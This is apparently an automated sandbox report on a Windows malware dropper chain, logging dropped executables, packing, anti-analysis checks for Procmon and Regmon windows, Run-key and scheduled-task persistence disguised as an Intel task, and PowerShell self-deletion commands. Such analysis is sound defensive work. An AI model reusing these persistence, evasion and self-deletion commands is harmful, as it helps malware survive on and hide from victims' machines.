Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Google\Chrome\Extensions
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Windows Media Player\graph
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Windows Media Player\graph\graph.exe
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
Source: file.exe Static file information: File size 2969600 > 1048576
Source: file.exe Static PE information: Raw size of oadzzmvp is bigger than: 0x100000 < 0x2a3600
Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: 4115805b10.exe, 00000027.00000003.2754575088.00000268125C2000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000029.00000000.2754980065.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 00000029.00000002.2936121844.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002B.00000002.2935569861.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002B.00000000.2777839944.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002D.00000000.2854750206.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002D.00000002.2936047599.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: 4115805b10.exe, 00000027.00000000.2649047959.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000027.00000002.2797453206.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000002.2820458214.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000000.2667326161.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: 4115805b10.exe, 00000027.00000000.2649047959.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000027.00000002.2797453206.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000002.2820458214.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000000.2667326161.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdb source: skotes.exe, 00000005.00000002.2942570852.0000000000DEA000.00000004.00000020.00020000.00000000.sdmp, 322c3dce5b.exe, 00000033.00000000.2907742348.0000000000032000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdbdj~j pj_CorExeMainmscoree.dll source: skotes.exe, 00000005.00000002.2942570852.0000000000DEA000.00000004.00000020.00020000.00000000.sdmp, 322c3dce5b.exe, 00000033.00000000.2907742348.0000000000032000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: 4115805b10.exe, 00000027.00000003.2754575088.00000268125C2000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000029.00000000.2754980065.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 00000029.00000002.2936121844.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002B.00000002.2935569861.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002B.00000000.2777839944.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002D.00000000.2854750206.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002D.00000002.2936047599.00007FF68FAE9000.00000002.00000001.01000000.00000013.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.af0000.0.unpack :EW;.rsrc:W;.idata :W;oadzzmvp:EW;ccijuplx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;oadzzmvp:EW;ccijuplx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.150000.0.unpack :EW;.rsrc:W;.idata :W;oadzzmvp:EW;ccijuplx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;oadzzmvp:EW;ccijuplx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 5.2.skotes.exe.150000.0.unpack :EW;.rsrc:W;.idata :W;oadzzmvp:EW;ccijuplx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;oadzzmvp:EW;ccijuplx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Unpacked PE file: 32.2.b2885fa695.exe.3d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wekcazbo:EW;ttllozcv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wekcazbo:EW;ttllozcv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Unpacked PE file: 42.2.b7c03317c9.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pfkrromk:EW;hghjijlv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pfkrromk:EW;hghjijlv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: random[2].exe1.5.dr Static PE information: 0x94370F66 [Sun Oct 18 12:19:50 2048 UTC]
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo, 6_2_00402665
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: random[1].exe.5.dr Static PE information: real checksum: 0x0 should be: 0x7aa07
Source: b7c03317c9.exe.5.dr Static PE information: real checksum: 0x445664 should be: 0x4486a1
Source: Gxtuum.exe.36.dr Static PE information: real checksum: 0x0 should be: 0x7aa07
Source: random[2].exe0.5.dr Static PE information: real checksum: 0x1a555c should be: 0x15e8ab
Source: b2885fa695.exe.5.dr Static PE information: real checksum: 0x1d4149 should be: 0x1d15dc
Source: 4115805b10.exe.5.dr Static PE information: real checksum: 0x0 should be: 0x9f7ff
Source: 7z.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x7b29e
Source: 7z.dll.6.dr Static PE information: real checksum: 0x0 should be: 0x1a2c6b
Source: random[1].exe2.5.dr Static PE information: real checksum: 0x1d4149 should be: 0x1d15dc
Source: Intel_PTT_EK_Recertification.exe.20.dr Static PE information: real checksum: 0x0 should be: 0x1c320c
Source: in.exe.18.dr Static PE information: real checksum: 0x0 should be: 0x1c320c
Source: graph.exe.39.dr Static PE information: real checksum: 0x0 should be: 0x46f82
Source: 4cdf81e042.exe.5.dr Static PE information: real checksum: 0x1a555c should be: 0x15e8ab
Source: random[2].exe1.5.dr Static PE information: real checksum: 0x0 should be: 0x14b59
Source: file.exe Static PE information: real checksum: 0x2db94a should be: 0x2e37b5
Source: skotes.exe.0.dr Static PE information: real checksum: 0x2db94a should be: 0x2e37b5
Source: random[1].exe0.5.dr Static PE information: real checksum: 0x0 should be: 0x9f7ff
Source: 72f44ceb0a.exe.5.dr Static PE information: real checksum: 0x0 should be: 0x7aa07
Source: random[2].exe.5.dr Static PE information: real checksum: 0x445664 should be: 0x4486a1
Source: 322c3dce5b.exe.5.dr Static PE information: real checksum: 0x0 should be: 0x14b59
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: oadzzmvp
Source: file.exe Static PE information: section name: ccijuplx
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name: oadzzmvp
Source: skotes.exe.0.dr Static PE information: section name: ccijuplx
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[2].exe.5.dr Static PE information: section name:
Source: random[2].exe.5.dr Static PE information: section name: .idata
Source: random[2].exe.5.dr Static PE information: section name:
Source: random[2].exe.5.dr Static PE information: section name: pfkrromk
Source: random[2].exe.5.dr Static PE information: section name: hghjijlv
Source: random[2].exe.5.dr Static PE information: section name: .taggant
Source: b7c03317c9.exe.5.dr Static PE information: section name:
Source: b7c03317c9.exe.5.dr Static PE information: section name: .idata
Source: b7c03317c9.exe.5.dr Static PE information: section name:
Source: b7c03317c9.exe.5.dr Static PE information: section name: pfkrromk
Source: b7c03317c9.exe.5.dr Static PE information: section name: hghjijlv
Source: b7c03317c9.exe.5.dr Static PE information: section name: .taggant
Source: random[2].exe0.5.dr Static PE information: section name: .eh_fram
Source: 4cdf81e042.exe.5.dr Static PE information: section name: .eh_fram
Source: random[1].exe2.5.dr Static PE information: section name:
Source: random[1].exe2.5.dr Static PE information: section name: .idata
Source: random[1].exe2.5.dr Static PE information: section name:
Source: random[1].exe2.5.dr Static PE information: section name: wekcazbo
Source: random[1].exe2.5.dr Static PE information: section name: ttllozcv
Source: random[1].exe2.5.dr Static PE information: section name: .taggant
Source: b2885fa695.exe.5.dr Static PE information: section name:
Source: b2885fa695.exe.5.dr Static PE information: section name: .idata
Source: b2885fa695.exe.5.dr Static PE information: section name:
Source: b2885fa695.exe.5.dr Static PE information: section name: wekcazbo
Source: b2885fa695.exe.5.dr Static PE information: section name: ttllozcv
Source: b2885fa695.exe.5.dr Static PE information: section name: .taggant
Source: in.exe.18.dr Static PE information: section name: UPX2
Source: Intel_PTT_EK_Recertification.exe.20.dr Static PE information: section name: UPX2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B0D91C push ecx; ret 0_2_00B0D92F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B01359 push es; ret 0_2_00B0135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0016D91C push ecx; ret 1_2_0016D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_001A0168 push es; retf 0004h 5_2_001A022E
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0016D91C push ecx; ret 5_2_0016D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0018DEDB push ss; iretd 5_2_0018DEDC
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0016DFC6 push ecx; ret 5_2_0016DFD9
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Code function: 6_2_004192C0 push eax; ret 6_2_004192EE
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 10_2_00CA676A push rcx; ret 10_2_00CA676B
Source: file.exe Static PE information: section name: entropy: 7.983040046559541
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.983040046559541
Source: random[2].exe.5.dr Static PE information: section name: pfkrromk entropy: 7.954681489515957
Source: b7c03317c9.exe.5.dr Static PE information: section name: pfkrromk entropy: 7.954681489515957
Source: random[1].exe2.5.dr Static PE information: section name: entropy: 7.980952558000639
Source: random[1].exe2.5.dr Static PE information: section name: wekcazbo entropy: 7.952954751128578
Source: b2885fa695.exe.5.dr Static PE information: section name: entropy: 7.980952558000639
Source: b2885fa695.exe.5.dr Static PE information: section name: wekcazbo entropy: 7.952954751128578
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe File created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe File created: C:\Users\user\AppData\Local\Temp\main\7z.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1019320001\4cdf81e042.exe
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe File created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe File created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1019321001\322c3dce5b.exe
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe File created: C:\Users\user\AppData\Local\Temp\main\7z.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe File created: C:\Program Files\Windows Media Player\graph\graph.exe

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Graph
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Registry value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run Graph
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
